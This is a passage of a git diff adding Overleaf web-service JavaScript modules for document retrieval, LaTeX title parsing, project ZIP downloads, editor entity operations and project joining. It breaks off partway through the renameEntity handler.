+ updates, + userId, + version: projectVersion, + projectHistoryId, + source, + }, + method: 'POST', + }, + projectId, + 'update-project-structure', + callback + ) + } + ) +} + +function _makeRequest(options, projectId, metricsKey, callback) { + const timer = new metrics.Timer(metricsKey) + request( + { + url: `${settings.apis.documentupdater.url}${options.path}`, + json: options.json, + method: options.method || 'GET', + timeout: options.timeout || 30 * 1000, + }, + function (error, res, body) { + timer.done() + if (error) { + logger.warn( + { error, projectId }, + 'error making request to document updater' + ) + callback(error) + } else if (res.statusCode >= 200 && res.statusCode < 300) { + callback(null, body) + } else { + error = new Error( + `document updater returned a failure status code: ${res.statusCode}` + ) + logger.warn( + { error, projectId }, + `document updater returned failure status code: ${res.statusCode}` + ) + callback(error) + } + } + ) +} + +function _getUpdates( + entityType, + oldEntities, + newEntities, + historyRangesSupport +) { + if (!oldEntities) { + oldEntities = [] + } + if (!newEntities) { + newEntities = [] + } + const deletes = [] + const adds = [] + const renames = [] + + const oldEntitiesHash = _.keyBy(oldEntities, entity => + entity[entityType]._id.toString() + ) + const newEntitiesHash = _.keyBy(newEntities, entity => + entity[entityType]._id.toString() + ) + + // Send deletes before adds (and renames) to keep a 1:1 mapping between + // paths and ids + // + // When a file is replaced, we first delete the old file and then add the + // new file. If the 'add' operation is sent to project history before the + // 'delete' then we would have two files with the same path at that point + // in time. + for (const id in oldEntitiesHash) { + const oldEntity = oldEntitiesHash[id] + const newEntity = newEntitiesHash[id] + + if (newEntity == null) { + // entity deleted + deletes.push({ + type: `rename-${entityType}`, + id, + pathname: oldEntity.path, + newPathname: '', + }) + } + } + const hasFilestore = Features.hasFeature('filestore') + + for (const id in newEntitiesHash) { + const newEntity = newEntitiesHash[id] + const oldEntity = oldEntitiesHash[id] + + if (oldEntity == null) { + // entity added + adds.push({ + type: `add-${entityType}`, + id, + pathname: newEntity.path, + docLines: newEntity.docLines, + ranges: newEntity.ranges, + historyRangesSupport, + url: newEntity.file != null && hasFilestore ? newEntity.url : undefined, + hash: newEntity.file != null ? newEntity.file.hash : undefined, + metadata: buildFileMetadataForHistory(newEntity.file), + createdBlob: (newEntity.createdBlob || !hasFilestore) ?? false, + }) + } else if (newEntity.path !== oldEntity.path) { + // entity renamed + renames.push({ + type: `rename-${entityType}`, + id, + pathname: oldEntity.path, + newPathname: newEntity.path, + }) + } + } + + return { deletes, adds, renames } +} + +function buildFileMetadataForHistory(file) { + if (!file?.linkedFileData) return undefined + + const metadata = { + // Files do not have a created at timestamp in the history. + // For cloned projects, the importedAt timestamp needs to remain untouched. + // Record the timestamp in the metadata blob to keep everything self-contained. + importedAt: file.created, + ...file.linkedFileData, + } + if (metadata.provider === 'project_output_file') { + // The build-id and clsi-server-id are only used for downloading file. + // Omit them from history as they are not useful in the future. + delete metadata.build_id + delete metadata.clsiServerId + } + return metadata +} + +module.exports = { + flushProjectToMongo, + flushMultipleProjectsToMongo, + flushProjectToMongoAndDelete, + flushDocToMongo, + deleteDoc, + getComment, + getDocument, + getProjectLastUpdatedAt, + setDocument, + appendToDocument, + getProjectDocsIfMatch, + clearProjectState, + acceptChanges, + resolveThread, + reopenThread, + deleteThread, + resyncProjectHistory, + blockProject, + unblockProject, + updateProjectStructure, + promises: { + flushProjectToMongo: promisify(flushProjectToMongo), + flushMultipleProjectsToMongo: promisify(flushMultipleProjectsToMongo), + flushProjectToMongoAndDelete: promisify(flushProjectToMongoAndDelete), + flushDocToMongo: promisify(flushDocToMongo), + deleteDoc: promisify(deleteDoc), + getComment: promisify(getComment), + getDocument: promisifyMultiResult(getDocument, [ + 'lines', + 'version', + 'ranges', + 'ops', + ]), + setDocument: promisify(setDocument), + getProjectDocsIfMatch: promisify(getProjectDocsIfMatch), + getProjectLastUpdatedAt: promisify(getProjectLastUpdatedAt), + clearProjectState: promisify(clearProjectState), + acceptChanges: promisify(acceptChanges), + resolveThread: promisify(resolveThread), + reopenThread: promisify(reopenThread), + deleteThread: promisify(deleteThread), + resyncProjectHistory: promisify(resyncProjectHistory), + blockProject: promisify(blockProject), + unblockProject: promisify(unblockProject), + updateProjectStructure: promisify(updateProjectStructure), + appendToDocument: promisify(appendToDocument), + }, +} diff --git a/services/web/app/src/Features/Documents/DocumentController.mjs b/services/web/app/src/Features/Documents/DocumentController.mjs new file mode 100644 index 0000000..6886414 --- /dev/null +++ b/services/web/app/src/Features/Documents/DocumentController.mjs @@ -0,0 +1,95 @@ +import ChatApiHandler from '../Chat/ChatApiHandler.js' +import ProjectGetter from '../Project/ProjectGetter.js' +import ProjectLocator from '../Project/ProjectLocator.js' +import ProjectEntityHandler from '../Project/ProjectEntityHandler.js' +import ProjectEntityUpdateHandler from '../Project/ProjectEntityUpdateHandler.js' +import logger from '@overleaf/logger' +import _ from 'lodash' +import { plainTextResponse } from '../../infrastructure/Response.js' +import { expressify } from '@overleaf/promise-utils' + +async function getDocument(req, res) { + const { Project_id: projectId, doc_id: docId } = req.params + const plain = req.query.plain === 'true' + const peek = req.query.peek === 'true' + const project = await ProjectGetter.promises.getProject(projectId, { + rootFolder: true, + overleaf: true, + }) + if (!project) { + return res.sendStatus(404) + } + + const { path } = await ProjectLocator.promises.findElement({ + project, + element_id: docId, + type: 'doc', + }) + + const { lines, version, ranges } = await ProjectEntityHandler.promises.getDoc( + projectId, + docId, + { peek } + ) + + const resolvedCommentIdsInProject = + await ChatApiHandler.promises.getResolvedThreadIds(projectId) + + const commentIdsInDoc = new Set( + ranges?.comments?.map(comment => comment.id) ?? [] + ) + + const resolvedCommentIds = resolvedCommentIdsInProject.filter(commentId => + commentIdsInDoc.has(commentId) + ) + + if (plain) { + plainTextResponse(res, lines.join('\n')) + } else { + const projectHistoryId = _.get(project, 'overleaf.history.id') + const historyRangesSupport = _.get( + project, + 'overleaf.history.rangesSupportEnabled', + false + ) + + // all projects are now migrated to Full Project History, keeping the field + // for API compatibility + const projectHistoryType = 'project-history' + + res.json({ + lines, + version, + ranges, + pathname: path.fileSystem, + projectHistoryId, + projectHistoryType, + historyRangesSupport, + resolvedCommentIds, + }) + } +} + +async function setDocument(req, res) { + const { Project_id: projectId, doc_id: docId } = req.params + const { lines, version, ranges, lastUpdatedAt, lastUpdatedBy } = req.body + const result = await ProjectEntityUpdateHandler.promises.updateDocLines( + projectId, + docId, + lines, + version, + ranges, + lastUpdatedAt, + lastUpdatedBy + ) + logger.debug( + { docId, projectId }, + 'finished receiving set document request from api (docupdater)' + ) + res.json(result) +} + +export default { + getDocument: expressify(getDocument), + setDocument: expressify(setDocument), +} diff --git a/services/web/app/src/Features/Documents/DocumentHelper.js b/services/web/app/src/Features/Documents/DocumentHelper.js new file mode 100644 index 0000000..959cc91 --- /dev/null +++ b/services/web/app/src/Features/Documents/DocumentHelper.js @@ -0,0 +1,78 @@ +/* eslint-disable + max-len, + no-cond-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let DocumentHelper +module.exports = DocumentHelper = { + getTitleFromTexContent(content, maxContentToScan) { + if (maxContentToScan == null) { + maxContentToScan = 30000 + } + const TITLE_WITH_CURLY_BRACES = /\\[tT]itle\*?\s*{([^}]+)}/ + const TITLE_WITH_SQUARE_BRACES = /\\[tT]itle\s*\[([^\]]+)\]/ + for (const line of Array.from( + DocumentHelper._getLinesFromContent(content, maxContentToScan) + )) { + let match + if ( + (match = + line.match(TITLE_WITH_CURLY_BRACES) || + line.match(TITLE_WITH_SQUARE_BRACES)) + ) { + return DocumentHelper.detex(match[1]) + } + } + + return null + }, + + contentHasDocumentclass(content, maxContentToScan) { + if (maxContentToScan == null) { + maxContentToScan = 30000 + } + for (const line of Array.from( + DocumentHelper._getLinesFromContent(content, maxContentToScan) + )) { + // We've had problems with this regex locking up CPU. + // Previously /.*\\documentclass/ would totally lock up on lines of 500kb (data text files :() + // This regex will only look from the start of the line, including whitespace so will return quickly + // regardless of line length. + if (line.match(/^\s*\\documentclass/)) { + return true + } + } + + return false + }, + + detex(string) { + return string + .replace(/\\LaTeX/g, 'LaTeX') + .replace(/\\TeX/g, 'TeX') + .replace(/\\TikZ/g, 'TikZ') + .replace(/\\BibTeX/g, 'BibTeX') + .replace(/\\\[[A-Za-z0-9. ]*\]/g, ' ') // line spacing + .replace(/\\(?:[a-zA-Z]+|.|)/g, '') + .replace(/{}|~/g, ' ') + .replace(/[${}]/g, '') + .replace(/ +/g, ' ') + .trim() + }, + + _getLinesFromContent(content, maxContentToScan) { + if (typeof content === 'string') { + return content.substring(0, maxContentToScan).split('\n') + } else { + return content + } + }, +} diff --git a/services/web/app/src/Features/Downloads/ProjectDownloadsController.mjs b/services/web/app/src/Features/Downloads/ProjectDownloadsController.mjs new file mode 100644 index 0000000..6bd239b --- /dev/null +++ b/services/web/app/src/Features/Downloads/ProjectDownloadsController.mjs @@ -0,0 +1,79 @@ +/* eslint-disable + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import Metrics from '@overleaf/metrics' +import ProjectGetter from '../Project/ProjectGetter.js' +import ProjectZipStreamManager from './ProjectZipStreamManager.mjs' +import DocumentUpdaterHandler from '../DocumentUpdater/DocumentUpdaterHandler.js' +import { prepareZipAttachment } from '../../infrastructure/Response.js' + +let ProjectDownloadsController + +export default ProjectDownloadsController = { + downloadProject(req, res, next) { + const projectId = req.params.Project_id + Metrics.inc('zip-downloads') + return DocumentUpdaterHandler.flushProjectToMongo( + projectId, + function (error) { + if (error != null) { + return next(error) + } + return ProjectGetter.getProject( + projectId, + { name: true }, + function (error, project) { + if (error != null) { + return next(error) + } + return ProjectZipStreamManager.createZipStreamForProject( + projectId, + function (error, stream) { + if (error != null) { + return next(error) + } + prepareZipAttachment(res, `${project.name}.zip`) + return stream.pipe(res) + } + ) + } + ) + } + ) + }, + + downloadMultipleProjects(req, res, next) { + const projectIds = req.query.project_ids.split(',') + Metrics.inc('zip-downloads-multiple') + return DocumentUpdaterHandler.flushMultipleProjectsToMongo( + projectIds, + function (error) { + if (error != null) { + return next(error) + } + return ProjectZipStreamManager.createZipStreamForMultipleProjects( + projectIds, + function (error, stream) { + if (error != null) { + return next(error) + } + prepareZipAttachment( + res, + `Overleaf Projects (${projectIds.length} items).zip` + ) + return stream.pipe(res) + } + ) + } + ) + }, +} diff --git a/services/web/app/src/Features/Downloads/ProjectZipStreamManager.mjs b/services/web/app/src/Features/Downloads/ProjectZipStreamManager.mjs new file mode 100644 index 0000000..2c07251 --- /dev/null +++ b/services/web/app/src/Features/Downloads/ProjectZipStreamManager.mjs @@ -0,0 +1,160 @@ +import archiver from 'archiver' +import async from 'async' +import logger from '@overleaf/logger' +import ProjectEntityHandler from '../Project/ProjectEntityHandler.js' +import ProjectGetter from '../Project/ProjectGetter.js' +import HistoryManager from '../History/HistoryManager.js' +import FileStoreHandler from '../FileStore/FileStoreHandler.js' +import Features from '../../infrastructure/Features.js' +let ProjectZipStreamManager + +export default ProjectZipStreamManager = { + createZipStreamForMultipleProjects(projectIds, callback) { + // We'll build up a zip file that contains multiple zip files + const archive = archiver('zip') + archive.on('error', err => + logger.err( + { err, projectIds }, + 'something went wrong building archive of project' + ) + ) + callback(null, archive) + + const jobs = projectIds.map(projectId => cb => { + ProjectGetter.getProject(projectId, { name: true }, (error, project) => { + if (error) { + return cb(error) + } + if (!project) { + logger.debug( + { projectId }, + 'cannot append project to zip stream: project not found' + ) + return cb() + } + logger.debug( + { projectId, name: project.name }, + 'appending project to zip stream' + ) + ProjectZipStreamManager.createZipStreamForProject( + projectId, + (error, stream) => { + if (error) { + return cb(error) + } + archive.append(stream, { name: `${project.name}.zip` }) + stream.on('end', () => { + logger.debug( + { projectId, name: project.name }, + 'zip stream ended' + ) + cb() + }) + } + ) + }) + }) + + async.series(jobs, () => { + logger.debug( + { projectIds }, + 'finished creating zip stream of multiple projects' + ) + archive.finalize() + }) + }, + + createZipStreamForProject(projectId, callback) { + const archive = archiver('zip') + // return stream immediately before we start adding things to it + archive.on('error', err => + logger.err( + { err, projectId }, + 'something went wrong building archive of project' + ) + ) + callback(null, archive) + this.addAllDocsToArchive(projectId, archive, error => { + if (error) { + logger.error( + { err: error, projectId }, + 'error adding docs to zip stream' + ) + } + this.addAllFilesToArchive(projectId, archive, error => { + if (error) { + logger.error( + { err: error, projectId }, + 'error adding files to zip stream' + ) + } + archive.finalize() + }) + }) + }, + + addAllDocsToArchive(projectId, archive, callback) { + ProjectEntityHandler.getAllDocs(projectId, (error, docs) => { + if (error) { + return callback(error) + } + const jobs = Object.entries(docs).map(([path, doc]) => cb => { + if (path[0] === '/') { + path = path.slice(1) + } + logger.debug({ projectId }, 'Adding doc') + archive.append(doc.lines.join('\n'), { name: path }) + setImmediate(cb) + }) + async.series(jobs, callback) + }) + }, + + getFileStream: (projectId, file, callback) => { + if (Features.hasFeature('project-history-blobs')) { + HistoryManager.requestBlobWithFallback( + projectId, + file.hash, + file._id, + (error, result) => { + if (error) { + return callback(error) + } + const { stream } = result + callback(null, stream) + } + ) + } else { + FileStoreHandler.getFileStream(projectId, file._id, {}, callback) + } + }, + + addAllFilesToArchive(projectId, archive, callback) { + ProjectEntityHandler.getAllFiles(projectId, (error, files) => { + if (error) { + return callback(error) + } + const jobs = Object.entries(files).map(([path, file]) => cb => { + ProjectZipStreamManager.getFileStream( + projectId, + file, + (error, stream) => { + if (error) { + logger.warn( + { err: error, projectId, fileId: file._id }, + 'something went wrong adding file to zip archive' + ) + return cb(error) + } + if (path[0] === '/') { + path = path.slice(1) + } + archive.append(stream, { name: path }) + stream.on('end', () => cb()) + } + ) + }) + async.parallelLimit(jobs, 5, callback) + }) + }, +} diff --git a/services/web/app/src/Features/Editor/EditorController.js b/services/web/app/src/Features/Editor/EditorController.js new file mode 100644 index 0000000..4d3a5e9 --- /dev/null +++ b/services/web/app/src/Features/Editor/EditorController.js @@ -0,0 +1,695 @@ +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const Metrics = require('@overleaf/metrics') +const ProjectEntityUpdateHandler = require('../Project/ProjectEntityUpdateHandler') +const ProjectOptionsHandler = require('../Project/ProjectOptionsHandler') +const ProjectDetailsHandler = require('../Project/ProjectDetailsHandler') +const ProjectDeleter = require('../Project/ProjectDeleter') +const EditorRealTimeController = require('./EditorRealTimeController') +const async = require('async') +const PublicAccessLevels = require('../Authorization/PublicAccessLevels') +const { promisifyAll } = require('@overleaf/promise-utils') + +const EditorController = { + addDoc(projectId, folderId, docName, docLines, source, userId, callback) { + EditorController.addDocWithRanges( + projectId, + folderId, + docName, + docLines, + {}, + source, + userId, + callback + ) + }, + + addDocWithRanges( + projectId, + folderId, + docName, + docLines, + docRanges, + source, + userId, + callback + ) { + docName = docName.trim() + Metrics.inc('editor.add-doc') + ProjectEntityUpdateHandler.addDocWithRanges( + projectId, + folderId, + docName, + docLines, + docRanges, + userId, + source, + (err, doc, folderId) => { + if (err) { + OError.tag(err, 'error adding doc without lock', { + projectId, + docName, + }) + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'reciveNewDoc', + folderId, + doc, + source, + userId + ) + callback(err, doc) + } + ) + }, + + addFile( + projectId, + folderId, + fileName, + fsPath, + linkedFileData, + source, + userId, + callback + ) { + fileName = fileName.trim() + Metrics.inc('editor.add-file') + ProjectEntityUpdateHandler.addFile( + projectId, + folderId, + fileName, + fsPath, + linkedFileData, + userId, + source, + (err, fileRef, folderId) => { + if (err) { + OError.tag(err, 'error adding file without lock', { + projectId, + folderId, + fileName, + }) + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'reciveNewFile', + folderId, + fileRef, + source, + linkedFileData, + userId + ) + callback(err, fileRef) + } + ) + }, + + appendToDoc(projectId, docId, docLines, source, userId, callback) { + ProjectEntityUpdateHandler.appendToDoc( + projectId, + docId, + docLines, + source, + userId, + function (err, doc) { + if (err) { + OError.tag(err, 'error appending to doc', { + projectId, + docId, + }) + return callback(err) + } + callback(err, doc) + } + ) + }, + + upsertDoc(projectId, folderId, docName, docLines, source, userId, callback) { + ProjectEntityUpdateHandler.upsertDoc( + projectId, + folderId, + docName, + docLines, + source, + userId, + function (err, doc, didAddNewDoc) { + if (didAddNewDoc) { + EditorRealTimeController.emitToRoom( + projectId, + 'reciveNewDoc', + folderId, + doc, + source, + userId + ) + } + callback(err, doc) + } + ) + }, + + upsertFile( + projectId, + folderId, + fileName, + fsPath, + linkedFileData, + source, + userId, + callback + ) { + ProjectEntityUpdateHandler.upsertFile( + projectId, + folderId, + fileName, + fsPath, + linkedFileData, + userId, + source, + function (err, newFile, didAddFile, existingFile) { + if (err) { + return callback(err) + } + if (!didAddFile) { + // replacement, so remove the existing file from the client + EditorRealTimeController.emitToRoom( + projectId, + 'removeEntity', + existingFile._id, + source + ) + } + // now add the new file on the client + EditorRealTimeController.emitToRoom( + projectId, + 'reciveNewFile', + folderId, + newFile, + source, + linkedFileData, + userId + ) + callback(null, newFile) + } + ) + }, + + upsertDocWithPath( + projectId, + elementPath, + docLines, + source, + userId, + callback + ) { + ProjectEntityUpdateHandler.upsertDocWithPath( + projectId, + elementPath, + docLines, + source, + userId, + function (err, doc, didAddNewDoc, newFolders, lastFolder) { + if (err) { + return callback(err) + } + EditorController._notifyProjectUsersOfNewFolders( + projectId, + newFolders, + function (err) { + if (err) { + return callback(err) + } + if (didAddNewDoc) { + EditorRealTimeController.emitToRoom( + projectId, + 'reciveNewDoc', + lastFolder._id, + doc, + source, + userId + ) + } + callback(null, { doc, folder: lastFolder }) + } + ) + } + ) + }, + + upsertFileWithPath( + projectId, + elementPath, + fsPath, + linkedFileData, + source, + userId, + callback + ) { + ProjectEntityUpdateHandler.upsertFileWithPath( + projectId, + elementPath, + fsPath, + linkedFileData, + userId, + source, + function ( + err, + newFile, + didAddFile, + existingFile, + newFolders, + lastFolder + ) { + if (err) { + return callback(err) + } + EditorController._notifyProjectUsersOfNewFolders( + projectId, + newFolders, + function (err) { + if (err) { + return callback(err) + } + if (!didAddFile) { + // replacement, so remove the existing file from the client + EditorRealTimeController.emitToRoom( + projectId, + 'removeEntity', + existingFile._id, + source + ) + } + // now add the new file on the client + EditorRealTimeController.emitToRoom( + projectId, + 'reciveNewFile', + lastFolder._id, + newFile, + source, + linkedFileData, + userId + ) + callback(null, { file: newFile, folder: lastFolder }) + } + ) + } + ) + }, + + addFolder(projectId, folderId, folderName, source, userId, callback) { + folderName = folderName.trim() + Metrics.inc('editor.add-folder') + ProjectEntityUpdateHandler.addFolder( + projectId, + folderId, + folderName, + userId, + (err, folder, folderId) => { + if (err) { + OError.tag(err, 'could not add folder', { + projectId, + folderId, + folderName, + source, + }) + return callback(err) + } + EditorController._notifyProjectUsersOfNewFolder( + projectId, + folderId, + folder, + userId, + function (err) { + if (err) { + return callback(err) + } + callback(null, folder) + } + ) + } + ) + }, + + mkdirp(projectId, path, userId, callback) { + logger.debug({ projectId, path }, "making directories if they don't exist") + ProjectEntityUpdateHandler.mkdirp( + projectId, + path, + userId, + (err, newFolders, lastFolder) => { + if (err) { + OError.tag(err, 'could not mkdirp', { + projectId, + path, + }) + return callback(err) + } + + EditorController._notifyProjectUsersOfNewFolders( + projectId, + newFolders, + function (err) { + if (err) { + return callback(err) + } + callback(null, newFolders, lastFolder) + } + ) + } + ) + }, + + deleteEntity(projectId, entityId, entityType, source, userId, callback) { + Metrics.inc('editor.delete-entity') + ProjectEntityUpdateHandler.deleteEntity( + projectId, + entityId, + entityType, + userId, + source, + function (err) { + if (err) { + OError.tag(err, 'could not delete entity', { + projectId, + entityId, + entityType, + }) + return callback(err) + } + logger.debug( + { projectId, entityId, entityType }, + 'telling users entity has been deleted' + ) + EditorRealTimeController.emitToRoom( + projectId, + 'removeEntity', + entityId, + source + ) + callback() + } + ) + }, + + deleteEntityWithPath(projectId, path, source, userId, callback) { + ProjectEntityUpdateHandler.deleteEntityWithPath( + projectId, + path, + userId, + source, + function (err, entityId) { + if (err) { + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'removeEntity', + entityId, + source + ) + callback(null, entityId) + } + ) + }, + + updateProjectDescription(projectId, description, callback) { + logger.debug({ projectId, description }, 'updating project description') + ProjectDetailsHandler.setProjectDescription( + projectId, + description, + function (err) { + if (err) { + OError.tag( + err, + 'something went wrong setting the project description', + { + projectId, + description, + } + ) + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'projectDescriptionUpdated', + description + ) + callback() + } + ) + }, + + deleteProject(projectId, callback) { + Metrics.inc('editor.delete-project') + ProjectDeleter.deleteProject(projectId, callback) + }, + + renameEntity( + projectId, + entityId, + entityType, + newName, + userId, + source, + callback + ) { + Metrics.inc('editor.rename-entity') + ProjectEntityUpdateHandler.renameEntity( + projectId, + entityId, + entityType, + newName, + userId, + source, + function (err) { + if (err) { + OError.tag(err, 'error renaming entity', { + projectId, + entityId, + entityType, + newName, + }) + return callback(err) + } + if (newName.length > 0) { + EditorRealTimeController.emitToRoom( + projectId, + 'reciveEntityRename', + entityId, + newName + ) + } + callback() + } + ) + }, + + moveEntity( + projectId, + entityId, + folderId, + entityType, + userId, + source, + callback + ) { + Metrics.inc('editor.move-entity') + ProjectEntityUpdateHandler.moveEntity( + projectId, + entityId, + folderId, + entityType, + userId, + source, + function (err) { + if (err) { + OError.tag(err, 'error moving entity', { + projectId, + entityId, + folderId, + }) + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'reciveEntityMove', + entityId, + folderId + ) + callback() + } + ) + }, + + renameProject(projectId, newName, callback) { + ProjectDetailsHandler.renameProject(projectId, newName, function (err) { + if (err) { + OError.tag(err, 'error renaming project', { + projectId, + newName, + }) + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'projectNameUpdated', + newName + ) + callback() + }) + }, + + setCompiler(projectId, compiler, callback) { + ProjectOptionsHandler.setCompiler(projectId, compiler, function (err) { + if (err) { + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'compilerUpdated', + compiler + ) + callback() + }) + }, + + setImageName(projectId, imageName, callback) { + ProjectOptionsHandler.setImageName(projectId, imageName, function (err) { + if (err) { + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'imageNameUpdated', + imageName + ) + callback() + }) + }, + + setSpellCheckLanguage(projectId, languageCode, callback) { + ProjectOptionsHandler.setSpellCheckLanguage( + projectId, + languageCode, + function (err) { + if (err) { + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'spellCheckLanguageUpdated', + languageCode + ) + callback() + } + ) + }, + + setPublicAccessLevel(projectId, newAccessLevel, callback) { + async.series( + [ + cb => { + if (newAccessLevel === PublicAccessLevels.TOKEN_BASED) { + ProjectDetailsHandler.ensureTokensArePresent(projectId, cb) + } else { + cb() + } + }, + cb => + ProjectDetailsHandler.setPublicAccessLevel( + projectId, + newAccessLevel, + cb + ), + cb => { + EditorRealTimeController.emitToRoom( + projectId, + 'project:publicAccessLevel:changed', + { newAccessLevel } + ) + cb() + }, + ], + callback + ) + }, + + setRootDoc(projectId, newRootDocID, callback) { + ProjectEntityUpdateHandler.setRootDoc( + projectId, + newRootDocID, + function (err) { + if (err) { + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'rootDocUpdated', + newRootDocID + ) + callback() + } + ) + }, + + setMainBibliographyDoc(projectId, newBibliographyDocId, callback) { + ProjectEntityUpdateHandler.setMainBibliographyDoc( + projectId, + newBibliographyDocId, + function (err) { + if (err) { + return callback(err) + } + EditorRealTimeController.emitToRoom( + projectId, + 'mainBibliographyDocUpdated', + newBibliographyDocId + ) + callback() + } + ) + }, + + _notifyProjectUsersOfNewFolders(projectId, folders, callback) { + async.eachSeries( + folders, + (folder, cb) => + EditorController._notifyProjectUsersOfNewFolder( + projectId, + folder.parentFolder_id, + folder, + null, + cb + ), + callback + ) + }, + + _notifyProjectUsersOfNewFolder( + projectId, + folderId, + folder, + userId, + callback + ) { + EditorRealTimeController.emitToRoom( + projectId, + 'reciveNewFolder', + folderId, + folder, + userId + ) + callback() + }, +} + +EditorController.promises = promisifyAll(EditorController, { + multiResult: { + mkdirp: ['newFolders', 'lastFolder'], + }, +}) +module.exports = EditorController diff --git a/services/web/app/src/Features/Editor/EditorHttpController.js b/services/web/app/src/Features/Editor/EditorHttpController.js new file mode 100644 index 0000000..45c9b24 --- /dev/null +++ b/services/web/app/src/Features/Editor/EditorHttpController.js @@ -0,0 +1,294 @@ +const ProjectDeleter = require('../Project/ProjectDeleter') +const EditorController = require('./EditorController') +const ProjectGetter = require('../Project/ProjectGetter') +const AuthorizationManager = require('../Authorization/AuthorizationManager') +const ProjectEditorHandler = require('../Project/ProjectEditorHandler') +const Metrics = require('@overleaf/metrics') +const CollaboratorsGetter = require('../Collaborators/CollaboratorsGetter') +const CollaboratorsInviteGetter = require('../Collaborators/CollaboratorsInviteGetter') +const CollaboratorsHandler = require('../Collaborators/CollaboratorsHandler') +const PrivilegeLevels = require('../Authorization/PrivilegeLevels') +const SessionManager = require('../Authentication/SessionManager') +const Errors = require('../Errors/Errors') +const DocstoreManager = require('../Docstore/DocstoreManager') +const logger = require('@overleaf/logger') +const { expressify } = require('@overleaf/promise-utils') +const Settings = require('@overleaf/settings') + +module.exports = { + joinProject: expressify(joinProject), + addDoc: expressify(addDoc), + addFolder: expressify(addFolder), + renameEntity: expressify(renameEntity), + moveEntity: expressify(moveEntity), + deleteDoc: expressify(deleteDoc), + deleteFile: expressify(deleteFile), + deleteFolder: expressify(deleteFolder), + deleteEntity: expressify(deleteEntity), + _nameIsAcceptableLength, +} + +async function joinProject(req, res, next) { + const projectId = req.params.Project_id + let userId = req.body.userId // keep schema in sync with router + if (userId === 'anonymous-user') { + userId = null + } + Metrics.inc('editor.join-project') + const { + project, + privilegeLevel, + isRestrictedUser, + isTokenMember, + isInvitedMember, + } = await _buildJoinProjectView(req, projectId, userId) + if (!project) { + return res.sendStatus(403) + } + // Hide sensitive data if the user is restricted + if (isRestrictedUser) { + project.owner = { _id: project.owner._id } + project.members = [] + project.invites = [] + } + // Only show the 'renamed or deleted' message once + if (project.deletedByExternalDataSource) { + await ProjectDeleter.promises.unmarkAsDeletedByExternalSource(projectId) + } + + if (project.spellCheckLanguage) { + project.spellCheckLanguage = await chooseSpellCheckLanguage( + project.spellCheckLanguage + ) + } + + res.json({ + project, + privilegeLevel, + isRestrictedUser, + isTokenMember, + isInvitedMember, + }) +} + +async function _buildJoinProjectView(req, projectId, userId) { + const project = + await ProjectGetter.promises.getProjectWithoutDocLines(projectId) + if (project == null) { + throw new Errors.NotFoundError('project not found') + } + let deletedDocsFromDocstore = [] + try { + deletedDocsFromDocstore = + await DocstoreManager.promises.getAllDeletedDocs(projectId) + } catch (err) { + // The query in docstore is not optimized at this time and fails for + // projects with many very large, deleted documents. + // Not serving the user with deletedDocs from docstore may cause a minor + // UI issue with deleted files that are no longer available for restore. + logger.warn( + { err, projectId }, + 'soft-failure when fetching deletedDocs from docstore' + ) + } + const members = + await CollaboratorsGetter.promises.getInvitedMembersWithPrivilegeLevels( + projectId + ) + const token = req.body.anonymousAccessToken + const privilegeLevel = + await AuthorizationManager.promises.getPrivilegeLevelForProject( + userId, + projectId, + token + ) + if (privilegeLevel == null || privilegeLevel === PrivilegeLevels.NONE) { + return { project: null, privilegeLevel: null, isRestrictedUser: false } + } + const invites = + await CollaboratorsInviteGetter.promises.getAllInvites(projectId) + const isTokenMember = await CollaboratorsHandler.promises.userIsTokenMember( + userId, + projectId + ) + const isInvitedMember = + await CollaboratorsGetter.promises.isUserInvitedMemberOfProject( + userId, + projectId + ) + const isRestrictedUser = AuthorizationManager.isRestrictedUser( + userId, + privilegeLevel, + isTokenMember, + isInvitedMember + ) + return { + project: ProjectEditorHandler.buildProjectModelView( + project, + members, + invites, + deletedDocsFromDocstore + ), + privilegeLevel, + isTokenMember, + isInvitedMember, + isRestrictedUser, + } +} + +function _nameIsAcceptableLength(name) { + return name != null && name.length < 150 && name.length !== 0 +} + +async function addDoc(req, res, next) { + const projectId = req.params.Project_id + const { name } = req.body + const parentFolderId = req.body.parent_folder_id + const userId = SessionManager.getLoggedInUserId(req.session) + + if (!_nameIsAcceptableLength(name)) { + return res.sendStatus(400) + } + try { + const doc = await EditorController.promises.addDoc( + projectId, + parentFolderId, + name, + [], + 'editor', + userId + ) + res.json(doc) + } catch (err) { + if (err.message === 'project_has_too_many_files') { + res.status(400).json(req.i18n.translate('project_has_too_many_files')) + } else { + next(err) + } + } +} + +async function addFolder(req, res, next) { + const projectId = req.params.Project_id + const { name } = req.body + const parentFolderId = req.body.parent_folder_id + const userId = SessionManager.getLoggedInUserId(req.session) + if (!_nameIsAcceptableLength(name)) { + return res.sendStatus(400) + } + try { + const doc = await EditorController.promises.addFolder( + projectId, + parentFolderId, + name, + 'editor', + userId + ) + res.json(doc) + } catch (err) { + if (err.message === 'project_has_too_many_files') { + res.status(400).json(req.i18n.translate('project_has_too_many_files')) + } else if (err.message === 'invalid element name') { + res.status(400).json(req.i18n.translate('invalid_file_name')) + } else { + next(err) + } + } +} + +async function renameEntity(req, res, next) { + const projectId = req.params.Project_id + const entityId = req.params.entity_id + const entityType = req.params.entity_type + const { name, source = 'editor' } = req.body + if (!_nameIsAcceptableLength(name)) { + return res.sendStatus(400) + } + const userId = 